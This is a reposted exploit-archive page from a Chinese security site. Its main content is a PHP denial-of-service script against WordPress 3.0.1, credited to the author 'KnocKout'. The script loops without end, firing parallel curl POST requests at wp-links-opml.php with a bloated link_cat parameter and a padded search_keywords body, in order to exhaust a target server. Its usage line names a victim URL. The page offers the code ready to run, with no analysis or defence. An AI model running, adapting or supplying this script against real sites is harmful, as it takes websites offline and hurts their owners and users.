Wordpress 3.0.1 - Remote Denial Of Service Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Wordpress 3.0.1 - Remote Denial Of Service Exploit

来源：Cyber-Warrior.Org/CWKnocKout 作者：KnocKout 发布时间：2010-09-10

###################################
*/ Wordpress 3.0.1 - Remote Denial Of Service Exploit
*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3
*/ Contact : knockoutr@msn.com
*/ Category : Remote
                                   Cyber-Warrior.Org/CWKnocKout

                                    TЬM ЭSLAM ALEMЭNЭN RAMAZAN BAYRAMI MЬBAREK OLSUN


##################################
SPECЭAL THANKS
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __ /'__`\        /\ \__ /'__`\                   0
0 /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \ _ ___           1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

##################Exploit Codes###################################

<?php

// Curl php5 ;)

function info()
{
echo "##################################################################\n";
echo "# Wordpress 3.0.1 - Remote Denial Of Service Exploit\n";
echo "# Author: KnocKout\n";
echo "# Greatz : DaiMon,BARCOD3\n";
echo "##################################################################\n";
echo "# php poc.php target\n";
echo "# php poc.php http://www.victim.com/PATH/ 20 5\n";
echo "________________________________________\n";
exit;
}

if($argc !== 4 || !preg_match('#^\d+$#', $argv[2]) || !preg_match('#^\d+$#', $argv[3]))
{
info();
}

$url = $argv[1];
$threads = (int) $argv[2];
$timeout = (int) $argv[3];

$ptimeout = $timeout * 100;

$packet = implode('+', range(100,999));

while(1)
{
$m = curl_multi_init();

for($i = 0; $i < $threads; $i++)
{
$c[$i] = curl_init();
$opts = array
(
CURLOPT_URL => $url . 'wp-links-opml.php?link_cat=--0-0-0-0-0-0-0-0-0-0-0--0-0-0-0-0-0-0-0-0-0-0--0-0-0-0-0-0-0-0-0-0-0--0-0-0-0-0-0-0-0-0-0-0',
CURLOPT_USERAGENT => 'Opera/9.80 (Windows NT 5.1; U; pl) Presto/2.5.24 Version/10.52',
CURLOPT_ENCODING => 'gzip, deflate',
CURLOPT_POST => 1,
CURLOPT_POSTFIELDS => 'search_keywords='. $packet .'0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_TIMEOUT => $timeout,
);
curl_setopt_array($c[$i], $opts);
curl_multi_add_handle($m, $c[$i]);
}

$t = 0;
do
{
curl_multi_exec($m, $r);
usleep(100000);

$t++;

if($t > $ptimeout)
{
curl_multi_close($m);
for($i = 0; $i < $threads; $i++)
{
curl_close($c[$i]);
}
break;
}
}
while($r > 0);

echo '.';
}
?>

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告